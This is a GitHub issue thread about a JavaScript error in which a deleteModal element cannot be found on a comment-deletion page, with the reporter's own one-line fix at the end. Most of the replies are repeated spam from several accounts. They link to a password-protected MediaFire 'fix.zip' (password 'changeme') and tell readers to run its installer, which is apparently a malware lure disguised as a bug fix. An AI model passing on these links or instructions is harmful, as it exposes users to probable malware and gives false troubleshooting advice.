### ISSUE TITLE
BUG: Can not read property

### ISSUE THREAD

**Issue by Josseyo** [Josseyo/Cultivating_Intelligence#39]
**Describe the bug**
The error is shown when inspecting the site with google dev tools. The code doesn't seem to find any id deleteModal. 

Error belongs to Delete a Comment # 20

**Screenshots**
![Error comment deleteModal](https://github.com/user-attachments/assets/a7273000-b64e-4c78-8314-c2e4478b171a)

![Error comment deleteModal](https://github.com/user-attachments/assets/b52b6cdc-8c80-4349-81d8-cd898145fba9)

**Desktop (please complete the following information):**
 - iOS, Version 12.7.3 
 - Chrome Browser, Version 127.0.6533.122

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Josseyo** [comment]
Add if statement to solve it
